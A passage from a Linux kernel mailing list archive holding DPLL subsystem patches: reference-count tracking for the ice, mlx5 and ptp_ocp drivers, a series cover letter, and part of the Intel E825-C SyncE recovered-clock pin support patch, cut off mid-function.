dpll_pin_put(rclk->pin, NULL); + dpll_pin_put(rclk->pin, &rclk->tracker); } /** @@ -3247,7 +3247,7 @@ ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) { if (cgu) dpll_device_unregister(d->dpll, d->ops, d); - dpll_device_put(d->dpll, NULL); + dpll_device_put(d->dpll, &d->tracker); } /** @@ -3271,7 +3271,8 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, u64 clock_id = pf->dplls.clock_id; int ret; - d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE, NULL); + d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE, + &d->tracker); if (IS_ERR(d->dpll)) { ret = PTR_ERR(d->dpll); dev_err(ice_pf_to_dev(pf), @@ -3287,7 +3288,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, ice_dpll_update_state(pf, d, true); ret = dpll_device_register(d->dpll, type, ops, d); if (ret) { - dpll_device_put(d->dpll, NULL); + dpll_device_put(d->dpll, &d->tracker); return ret; } d->ops = ops; diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.h b/drivers/net/ethernet/intel/ice/ice_dpll.h index c0da03384ce91..63fac6510df6e 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.h +++ b/drivers/net/ethernet/intel/ice/ice_dpll.h @@ -23,6 +23,7 @@ enum ice_dpll_pin_sw { /** ice_dpll_pin - store info about pins * @pin: dpll pin structure * @pf: pointer to pf, which has registered the dpll_pin + * @tracker: reference count tracker * @idx: ice pin private idx * @num_parents: hols number of parent pins * @parent_idx: hold indexes of parent pins @@ -37,6 +38,7 @@ enum ice_dpll_pin_sw { struct ice_dpll_pin { struct dpll_pin *pin; struct ice_pf *pf; + dpll_tracker tracker; u8 idx; u8 num_parents; u8 parent_idx[ICE_DPLL_RCLK_NUM_MAX]; @@ -58,6 +60,7 @@ struct ice_dpll_pin { /** ice_dpll - store info required for DPLL control * @dpll: pointer to dpll dev * @pf: pointer to pf, which has registered the dpll_device + * @tracker: reference count tracker * @dpll_idx: index of dpll on the NIC * @input_idx: currently selected input index * @prev_input_idx: previously selected input index @@ -76,6 +79,7 @@ struct ice_dpll_pin { struct ice_dpll { struct dpll_device *dpll; struct ice_pf *pf; + dpll_tracker tracker; u8 dpll_idx; u8 input_idx; u8 prev_input_idx; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c index 541d83e5d7183..3981dd81d4c17 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c @@ -9,7 +9,9 @@ */ struct mlx5_dpll { struct dpll_device *dpll; + dpll_tracker dpll_tracker; struct dpll_pin *dpll_pin; + dpll_tracker pin_tracker; struct mlx5_core_dev *mdev; struct workqueue_struct *wq; struct delayed_work work; @@ -438,7 +440,8 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, auxiliary_set_drvdata(adev, mdpll); /* Multiple mdev instances might share one DPLL device. */ - mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE, NULL); + mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE, + &mdpll->dpll_tracker); if (IS_ERR(mdpll->dpll)) { err = PTR_ERR(mdpll->dpll); goto err_free_mdpll; @@ -452,7 +455,7 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, /* Multiple mdev instances might share one DPLL pin. */ mdpll->dpll_pin = dpll_pin_get(clock_id, mlx5_get_dev_index(mdev), THIS_MODULE, &mlx5_dpll_pin_properties, - NULL); + &mdpll->pin_tracker); if (IS_ERR(mdpll->dpll_pin)) { err = PTR_ERR(mdpll->dpll_pin); goto err_unregister_dpll_device; @@ -480,11 +483,11 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); err_put_dpll_pin: - dpll_pin_put(mdpll->dpll_pin, NULL); + dpll_pin_put(mdpll->dpll_pin, &mdpll->pin_tracker); err_unregister_dpll_device: dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); err_put_dpll_device: - dpll_device_put(mdpll->dpll, NULL); + dpll_device_put(mdpll->dpll, &mdpll->dpll_tracker); err_free_mdpll: kfree(mdpll); return err; @@ -500,9 +503,9 @@ static void mlx5_dpll_remove(struct auxiliary_device *adev) destroy_workqueue(mdpll->wq); dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); - dpll_pin_put(mdpll->dpll_pin, NULL); + dpll_pin_put(mdpll->dpll_pin, &mdpll->pin_tracker); dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); - dpll_device_put(mdpll->dpll, NULL); + dpll_device_put(mdpll->dpll, &mdpll->dpll_tracker); kfree(mdpll); mlx5_dpll_synce_status_set(mdev, diff --git a/drivers/ptp/ptp_ocp.c b/drivers/ptp/ptp_ocp.c index f39b3966b3e8c..1b16a9c3d7fdc 100644 --- a/drivers/ptp/ptp_ocp.c +++ b/drivers/ptp/ptp_ocp.c @@ -285,6 +285,7 @@ struct ptp_ocp_sma_connector { u8 default_fcn; struct dpll_pin *dpll_pin; struct dpll_pin_properties dpll_prop; + dpll_tracker tracker; }; struct ocp_attr_group { @@ -383,6 +384,7 @@ struct ptp_ocp { struct ptp_ocp_sma_connector sma[OCP_SMA_NUM]; const struct ocp_sma_op *sma_op; struct dpll_device *dpll; + dpll_tracker tracker; int signals_nr; int freq_in_nr; }; @@ -4788,7 +4790,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) devlink_register(devlink); clkid = pci_get_dsn(pdev); - bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE, NULL); + bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE, &bp->tracker); if (IS_ERR(bp->dpll)) { err = PTR_ERR(bp->dpll); dev_err(&pdev->dev, "dpll_device_alloc failed\n"); @@ -4801,7 +4803,8 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) for (i = 0; i < OCP_SMA_NUM; i++) { bp->sma[i].dpll_pin = dpll_pin_get(clkid, i, THIS_MODULE, - &bp->sma[i].dpll_prop, NULL); + &bp->sma[i].dpll_prop, + &bp->sma[i].tracker); if (IS_ERR(bp->sma[i].dpll_pin)) { err = PTR_ERR(bp->sma[i].dpll_pin); goto out_dpll; @@ -4810,7 +4813,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) err = dpll_pin_register(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); if (err) { - dpll_pin_put(bp->sma[i].dpll_pin, NULL); + dpll_pin_put(bp->sma[i].dpll_pin, &bp->sma[i].tracker); goto out_dpll; } } @@ -4820,9 +4823,9 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) out_dpll: while (i--) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin, NULL); + dpll_pin_put(bp->sma[i].dpll_pin, &bp->sma[i].tracker); } - dpll_device_put(bp->dpll, NULL); + dpll_device_put(bp->dpll, &bp->tracker); out: ptp_ocp_detach(bp); out_disable: @@ -4843,11 +4846,11 @@ ptp_ocp_remove(struct pci_dev *pdev) for (i = 0; i < OCP_SMA_NUM; i++) { if (bp->sma[i].dpll_pin) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin, NULL); + dpll_pin_put(bp->sma[i].dpll_pin, &bp->sma[i].tracker); } } dpll_device_unregister(bp->dpll, &dpll_ops, bp); - dpll_device_put(bp->dpll, NULL); + dpll_device_put(bp->dpll, &bp->tracker); devlink_unregister(devlink); ptp_ocp_detach(bp); pci_disable_device(pdev); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:37 +0100", "thread_id": "20260202171638.17427-4-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
From: Arkadiusz Kubalewski <arkadiusz.kubalewski@intel.com> Implement SyncE support for the E825-C Ethernet controller using the DPLL subsystem. Unlike E810, the E825-C architecture relies on platform firmware (ACPI) to describe connections between the NIC's recovered clock outputs and external DPLL inputs. Implement the following mechanisms to support this architecture: 1. Discovery Mechanism: The driver parses the 'dpll-pins' and 'dpll-pin names' firmware properties to identify the external DPLL pins (parents) corresponding to its RCLK outputs ("rclk0", "rclk1"). It uses fwnode_dpll_pin_find() to locate these parent pins in the DPLL core. 2. Asynchronous Registration: Since the platform DPLL driver (e.g. zl3073x) may probe independently of the network driver, utilize the DPLL notifier chain The driver listens for DPLL_PIN_CREATED events to detect when the parent MUX pins become available, then registers its own Recovered Clock (RCLK) pins as children of those parents. 3. Hardware Configuration: Implement the specific register access logic for E825-C CGU (Clock Generation Unit) registers (R10, R11). This includes configuring the bypass MUXes and clock dividers required to drive SyncE signals. 4. Split Initialization: Refactor `ice_dpll_init()` to separate the static initialization path of E810 from the dynamic, firmware-driven path required for E825-C. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Co-developed-by: Ivan Vecera <ivecera@redhat.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> Co-developed-by: Grzegorz Nitka <grzegorz.nitka@intel.com> Signed-off-by: Grzegorz Nitka <grzegorz.nitka@intel.com> Signed-off-by: Arkadiusz Kubalewski <arkadiusz.kubalewski@intel.com> --- v3: * DPLL init check in ice_ptp_link_change() * using completion for dpll initization to avoid races with DPLL notifier scheduled works * added parsing of dpll-pin-names and dpll-pins properties v2: * fixed error path in ice_dpll_init_pins_e825() * fixed misleading comment referring 'device tree' --- drivers/net/ethernet/intel/ice/ice_dpll.c | 742 +++++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 26 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 ++++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + 8 files changed, 956 insertions(+), 92 deletions(-) diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.c b/drivers/net/ethernet/intel/ice/ice_dpll.c index 4eca62688d834..a8c99e49bfae6 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.c +++ b/drivers/net/ethernet/intel/ice/ice_dpll.c @@ -5,6 +5,7 @@ #include "ice_lib.h" #include "ice_trace.h" #include <linux/dpll.h> +#include <linux/property.h> #define ICE_CGU_STATE_ACQ_ERR_THRESHOLD 50 #define ICE_DPLL_PIN_IDX_INVALID 0xff @@ -528,6 +529,92 @@ ice_dpll_pin_disable(struct ice_hw *hw, struct ice_dpll_pin *pin, return ret; } +/** + * ice_dpll_pin_store_state - updates the state of pin in SW bookkeeping + * @pin: pointer to a pin + * @parent: parent pin index + * @state: pin state (connected or disconnected) + */ +static void +ice_dpll_pin_store_state(struct ice_dpll_pin *pin, int parent, bool state) +{ + pin->state[parent] = state ? DPLL_PIN_STATE_CONNECTED : + DPLL_PIN_STATE_DISCONNECTED; +} + +/** + * ice_dpll_rclk_update_e825c - updates the state of rclk pin on e825c device + * @pf: private board struct + * @pin: pointer to a pin + * + * Update struct holding pin states info, states are separate for each parent + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - OK + * * negative - error + */ +static int ice_dpll_rclk_update_e825c(struct ice_pf *pf, + struct ice_dpll_pin *pin) +{ + u8 rclk_bits; + int err; + u32 reg; + + if (pf->dplls.rclk.num_parents > ICE_SYNCE_CLK_NUM) + return -EINVAL; + + err = ice_read_cgu_reg(&pf->hw, ICE_CGU_R10, &reg); + if (err) + return err; + + rclk_bits = FIELD_GET(ICE_CGU_R10_SYNCE_S_REF_CLK, reg); + ice_dpll_pin_store_state(pin, ICE_SYNCE_CLK0, rclk_bits == + (pf->ptp.port.port_num + ICE_CGU_BYPASS_MUX_OFFSET_E825C)); + + err = ice_read_cgu_reg(&pf->hw, ICE_CGU_R11, &reg); + if (err) + return err; + + rclk_bits = FIELD_GET(ICE_CGU_R11_SYNCE_S_BYP_CLK, reg); + ice_dpll_pin_store_state(pin, ICE_SYNCE_CLK1, rclk_bits == + (pf->ptp.port.port_num + ICE_CGU_BYPASS_MUX_OFFSET_E825C)); + + return 0; +} + +/** + * ice_dpll_rclk_update - updates the state of rclk pin on a device + * @pf: private board struct + * @pin: pointer to a pin + * @port_num: port number + * + * Update struct holding pin states info, states are separate for each parent + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - OK + * * negative - error + */ +static int ice_dpll_rclk_update(struct ice_pf *pf, struct ice_dpll_pin *pin, + u8 port_num) +{ + int ret; + + for (u8 parent = 0; parent < pf->dplls.rclk.num_parents; parent++) { + ret = ice_aq_get_phy_rec_clk_out(&pf->hw, &parent, &port_num, + &pin->flags[parent], NULL); + if (ret) + return ret; + + ice_dpll_pin_store_state(pin, parent, + ICE_AQC_GET_PHY_REC_CLK_OUT_OUT_EN & + pin->flags[parent]); + } + + return 0; +} + /** * ice_dpll_sw_pins_update - update status of all SW pins * @pf: private board struct @@ -668,22 +755,14 @@ ice_dpll_pin_state_update(struct ice_pf *pf, struct ice_dpll_pin *pin, } break; case ICE_DPLL_PIN_TYPE_RCLK_INPUT: - for (parent = 0; parent < pf->dplls.rclk.num_parents; - parent++) { - u8 p = parent; - - ret = ice_aq_get_phy_rec_clk_out(&pf->hw, &p, - &port_num, - &pin->flags[parent], - NULL); + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) { + ret = ice_dpll_rclk_update_e825c(pf, pin); + if (ret) + goto err; + } else { + ret = ice_dpll_rclk_update(pf, pin, port_num); if (ret) goto err; - if (ICE_AQC_GET_PHY_REC_CLK_OUT_OUT_EN & - pin->flags[parent]) - pin->state[parent] = DPLL_PIN_STATE_CONNECTED; - else - pin->state[parent] = - DPLL_PIN_STATE_DISCONNECTED; } break; case ICE_DPLL_PIN_TYPE_SOFTWARE: @@ -1842,6 +1921,40 @@ ice_dpll_phase_offset_get(const struct dpll_pin *pin, void *pin_priv, return 0; } +/** + * ice_dpll_synce_update_e825c - setting PHY recovered clock pins on e825c + * @hw: Pointer to the HW struct + * @ena: true if enable, false in disable + * @port_num: port number + * @output: output pin, we have two in E825C + * + * DPLL subsystem callback. Set proper signals to recover clock from port. + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - success + * * negative - error + */ +static int ice_dpll_synce_update_e825c(struct ice_hw *hw, bool ena, + u32 port_num, enum ice_synce_clk output) +{ + int err; + + /* configure the mux to deliver proper signal to DPLL from the MUX */ + err = ice_tspll_cfg_bypass_mux_e825c(hw, ena, port_num, output); + if (err) + return err; + + err = ice_tspll_cfg_synce_ethdiv_e825c(hw, output); + if (err) + return err; + + dev_dbg(ice_hw_to_dev(hw), "CLK_SYNCE%u recovered clock: pin %s\n", + output, str_enabled_disabled(ena)); + + return 0; +} + /** * ice_dpll_output_esync_set - callback for setting embedded sync * @pin: pointer to a pin @@ -2263,6 +2376,28 @@ ice_dpll_sw_input_ref_sync_get(const struct dpll_pin *pin, void *pin_priv, state, extack); } +static int +ice_dpll_pin_get_parent_num(struct ice_dpll_pin *pin, + const struct dpll_pin *parent) +{ + int i; + + for (i = 0; i < pin->num_parents; i++) + if (pin->pf->dplls.inputs[pin->parent_idx[i]].pin == parent) + return i; + + return -ENOENT; +} + +static int +ice_dpll_pin_get_parent_idx(struct ice_dpll_pin *pin, + const struct dpll_pin *parent) +{ + int num = ice_dpll_pin_get_parent_num(pin, parent); + + return num < 0 ? num : pin->parent_idx[num]; +} + /** * ice_dpll_rclk_state_on_pin_set - set a state on rclk pin * @pin: pointer to a pin @@ -2286,35 +2421,44 @@ ice_dpll_rclk_state_on_pin_set(const struct dpll_pin *pin, void *pin_priv, enum dpll_pin_state state, struct netlink_ext_ack *extack) { - struct ice_dpll_pin *p = pin_priv, *parent = parent_pin_priv; bool enable = state == DPLL_PIN_STATE_CONNECTED; + struct ice_dpll_pin *p = pin_priv; struct ice_pf *pf = p->pf; + struct ice_hw *hw; int ret = -EINVAL; - u32 hw_idx; + int hw_idx; + + hw = &pf->hw; if (ice_dpll_is_reset(pf, extack)) return -EBUSY; mutex_lock(&pf->dplls.lock); - hw_idx = parent->idx - pf->dplls.base_rclk_idx; - if (hw_idx >= pf->dplls.num_inputs) + hw_idx = ice_dpll_pin_get_parent_idx(p, parent_pin); + if (hw_idx < 0) goto unlock; if ((enable && p->state[hw_idx] == DPLL_PIN_STATE_CONNECTED) || (!enable && p->state[hw_idx] == DPLL_PIN_STATE_DISCONNECTED)) { NL_SET_ERR_MSG_FMT(extack, "pin:%u state:%u on parent:%u already set", - p->idx, state, parent->idx); + p->idx, state, + ice_dpll_pin_get_parent_num(p, parent_pin)); goto unlock; } - ret = ice_aq_set_phy_rec_clk_out(&pf->hw, hw_idx, enable, - &p->freq); + + ret = hw->mac_type == ICE_MAC_GENERIC_3K_E825 ? + ice_dpll_synce_update_e825c(hw, enable, + pf->ptp.port.port_num, + (enum ice_synce_clk)hw_idx) : + ice_aq_set_phy_rec_clk_out(hw, hw_idx, enable, &p->freq); if (ret) NL_SET_ERR_MSG_FMT(extack, "err:%d %s failed to set pin state:%u for pin:%u on parent:%u", ret, - libie_aq_str(pf->hw.adminq.sq_last_status), - state, p->idx, parent->idx); + libie_aq_str(hw->adminq.sq_last_status), + state, p->idx, + ice_dpll_pin_get_parent_num(p, parent_pin)); unlock: mutex_unlock(&pf->dplls.lock); @@ -2344,17 +2488,17 @@ ice_dpll_rclk_state_on_pin_get(const struct dpll_pin *pin, void *pin_priv, enum dpll_pin_state *state, struct netlink_ext_ack *extack) { - struct ice_dpll_pin *p = pin_priv, *parent = parent_pin_priv; + struct ice_dpll_pin *p = pin_priv; struct ice_pf *pf = p->pf; int ret = -EINVAL; - u32 hw_idx; + int hw_idx; if (ice_dpll_is_reset(pf, extack)) return -EBUSY; mutex_lock(&pf->dplls.lock); - hw_idx = parent->idx - pf->dplls.base_rclk_idx; - if (hw_idx >= pf->dplls.num_inputs) + hw_idx = ice_dpll_pin_get_parent_idx(p, parent_pin); + if (hw_idx < 0) goto unlock; ret = ice_dpll_pin_state_update(pf, p, ICE_DPLL_PIN_TYPE_RCLK_INPUT, @@ -2814,7 +2958,8 @@ static void ice_dpll_release_pins(struct ice_dpll_pin *pins, int count) int i; for (i = 0; i < count; i++) - dpll_pin_put(pins[i].pin, &pins[i].tracker); + if (!IS_ERR_OR_NULL(pins[i].pin)) + dpll_pin_put(pins[i].pin, &pins[i].tracker); } /** @@ -2836,10 +2981,14 @@ static int ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, int start_idx, int count, u64 clock_id) { + u32 pin_index; int i, ret; for (i = 0; i < count; i++) { - pins[i].pin = dpll_pin_get(clock_id, i + start_idx, THIS_MODULE, + pin_index = start_idx; + if (start_idx != DPLL_PIN_IDX_UNSPEC) + pin_index += i; + pins[i].pin = dpll_pin_get(clock_id, pin_index, THIS_MODULE, &pins[i].prop, &pins[i].tracker); if (IS_ERR(pins[i].pin)) { ret = PTR_ERR(pins[i].pin); @@ -2944,6 +3093,7 @@ ice_dpll_register_pins(struct dpll_device *dpll, struct ice_dpll_pin *pins, /** * ice_dpll_deinit_direct_pins - deinitialize direct pins + * @pf: board private structure * @cgu: if cgu is present and controlled by this NIC * @pins: pointer to pins array * @count: number of pins @@ -2955,7 +3105,8 @@ ice_dpll_register_pins(struct dpll_device *dpll, struct ice_dpll_pin *pins, * Release pins resources to the dpll subsystem. */ static void -ice_dpll_deinit_direct_pins(bool cgu, struct ice_dpll_pin *pins, int count, +ice_dpll_deinit_direct_pins(struct ice_pf *pf, bool cgu, + struct ice_dpll_pin *pins, int count, const struct dpll_pin_ops *ops, struct dpll_device *first, struct dpll_device *second) @@ -3024,14 +3175,14 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) { struct ice_dpll_pin *rclk = &pf->dplls.rclk; struct ice_vsi *vsi = ice_get_main_vsi(pf); - struct dpll_pin *parent; + struct ice_dpll_pin *parent; int i; for (i = 0; i < rclk->num_parents; i++) { - parent = pf->dplls.inputs[rclk->parent_idx[i]].pin; - if (!parent) + parent = &pf->dplls.inputs[rclk->parent_idx[i]]; + if (IS_ERR_OR_NULL(parent->pin)) continue; - dpll_pin_on_pin_unregister(parent, rclk->pin, + dpll_pin_on_pin_unregister(parent->pin, rclk->pin, &ice_dpll_rclk_ops, rclk); } if (WARN_ON_ONCE(!vsi || !vsi->netdev)) @@ -3040,60 +3191,213 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) dpll_pin_put(rclk->pin, &rclk->tracker); } +static bool ice_dpll_is_fwnode_pin(struct ice_dpll_pin *pin) +{ + return !IS_ERR_OR_NULL(pin->fwnode); +} + +static void ice_dpll_pin_notify_work(struct work_struct *work) +{ + struct ice_dpll_pin_work *w = container_of(work, + struct ice_dpll_pin_work, + work); + struct ice_dpll_pin *pin, *parent = w->pin; + struct ice_pf *pf = parent->pf; + int ret; + + wait_for_completion(&pf->dplls.dpll_init); + if (!test_bit(ICE_FLAG_DPLL, pf->flags)) + return; /* DPLL initialization failed */ + + switch (w->action) { + case DPLL_PIN_CREATED: + if (!IS_ERR_OR_NULL(parent->pin)) { + /* We have already our pin registered */ + goto out; + } + + /* Grab reference on fwnode pin */ + parent->pin = fwnode_dpll_pin_find(parent->fwnode, + &parent->tracker); + if (IS_ERR_OR_NULL(parent->pin)) { + dev_err(ice_pf_to_dev(pf), + "Cannot get fwnode pin reference\n"); + goto out; + } + + /* Register rclk pin */ + pin = &pf->dplls.rclk; + ret = dpll_pin_on_pin_register(parent->pin, pin->pin, + &ice_dpll_rclk_ops, pin); + if (ret) { + dev_err(ice_pf_to_dev(pf), + "Failed to register pin: %pe\n", ERR_PTR(ret)); + dpll_pin_put(parent->pin, &parent->tracker); + parent->pin = NULL; + goto out; + } + break; + case DPLL_PIN_DELETED: + if (IS_ERR_OR_NULL(parent->pin)) { + /* We have already our pin unregistered */ + goto out; + } + + /* Unregister rclk pin */ + pin = &pf->dplls.rclk; + dpll_pin_on_pin_unregister(parent->pin, pin->pin, + &ice_dpll_rclk_ops, pin); + + /* Drop fwnode pin reference */ + dpll_pin_put(parent->pin, &parent->tracker); + parent->pin = NULL; + break; + default: + break; + } +out: + kfree(w); +} + +static int ice_dpll_pin_notify(struct notifier_block *nb, unsigned long action, + void *data) +{ + struct ice_dpll_pin *pin = container_of(nb, struct ice_dpll_pin, nb); + struct dpll_pin_notifier_info *info = data; + struct ice_dpll_pin_work *work; + + if (action != DPLL_PIN_CREATED && action != DPLL_PIN_DELETED) + return NOTIFY_DONE; + + /* Check if the reported pin is this one */ + if (pin->fwnode != info->fwnode) + return NOTIFY_DONE; /* Not this pin */ + + work = kzalloc(sizeof(*work), GFP_KERNEL); + if (!work) + return NOTIFY_DONE; + + INIT_WORK(&work->work, ice_dpll_pin_notify_work); + work->action = action; + work->pin = pin; + + queue_work(pin->pf->dplls.wq, &work->work); + + return NOTIFY_OK; +} + /** - * ice_dpll_init_rclk_pins - initialize recovered clock pin + * ice_dpll_init_pin_common - initialize pin * @pf: board private structure * @pin: pin to register * @start_idx: on which index shall allocation start in dpll subsystem * @ops: callback ops registered with the pins * - * Allocate resource for recovered clock pin in dpll subsystem. Register the - * pin with the parents it has in the info. Register pin with the pf's main vsi - * netdev. + * Allocate resource for given pin in dpll subsystem. Register the pin with + * the parents it has in the info. * * Return: * * 0 - success * * negative - registration failure reason */ static int -ice_dpll_init_rclk_pins(struct ice_pf *pf, struct ice_dpll_pin *pin, - int start_idx, const struct dpll_pin_ops *ops) +ice_dpll_init_pin_common(struct ice_pf *pf, struct ice_dpll_pin *pin, + int start_idx, const struct dpll_pin_ops *ops) { - struct ice_vsi *vsi = ice_get_main_vsi(pf); - struct dpll_pin *parent; + struct ice_dpll_pin *parent; int ret, i; - if (WARN_ON((!vsi || !vsi->netdev))) - return -EINVAL; - ret = ice_dpll_get_pins(pf, pin, start_idx, ICE_DPLL_RCLK_NUM_PER_PF, - pf->dplls.clock_id); + ret = ice_dpll_get_pins(pf, pin, start_idx, 1, pf->dplls.clock_id); if (ret) return ret; - for (i = 0; i < pf->dplls.rclk.num_parents; i++) { - parent = pf->dplls.inputs[pf->dplls.rclk.parent_idx[i]].pin; - if (!parent) { - ret = -ENODEV; - goto unregister_pins; + + for (i = 0; i < pin->num_parents; i++) { + parent = &pf->dplls.inputs[pin->parent_idx[i]]; + if (IS_ERR_OR_NULL(parent->pin)) { + if (!ice_dpll_is_fwnode_pin(parent)) { + ret = -ENODEV; + goto unregister_pins; + } + parent->pin = fwnode_dpll_pin_find(parent->fwnode, + &parent->tracker); + if (IS_ERR_OR_NULL(parent->pin)) { + dev_info(ice_pf_to_dev(pf), + "Mux pin not registered yet\n"); + continue; + } } - ret = dpll_pin_on_pin_register(parent, pf->dplls.rclk.pin, - ops, &pf->dplls.rclk); + ret = dpll_pin_on_pin_register(parent->pin, pin->pin, ops, pin); if (ret) goto unregister_pins; } - dpll_netdev_pin_set(vsi->netdev, pf->dplls.rclk.pin); return 0; unregister_pins: while (i) { - parent = pf->dplls.inputs[pf->dplls.rclk.parent_idx[--i]].pin; - dpll_pin_on_pin_unregister(parent, pf->dplls.rclk.pin, - &ice_dpll_rclk_ops, &pf->dplls.rclk); + parent = &pf->dplls.inputs[pin->parent_idx[--i]]; + if (IS_ERR_OR_NULL(parent->pin)) + continue; + dpll_pin_on_pin_unregister(parent->pin, pin->pin, ops, pin); } - ice_dpll_release_pins(pin, ICE_DPLL_RCLK_NUM_PER_PF); + ice_dpll_release_pins(pin, 1); + return ret; } +/** + * ice_dpll_init_rclk_pin - initialize recovered clock pin + * @pf: board private structure + * @start_idx: on which index shall allocation start in dpll subsystem + * @ops: callback ops registered with the pins + * + * Allocate resource for recovered clock pin in dpll subsystem. Register the + * pin with the parents it has in the info. + * + * Return: + * * 0 - success + * * negative - registration failure reason + */ +static int +ice_dpll_init_rclk_pin(struct 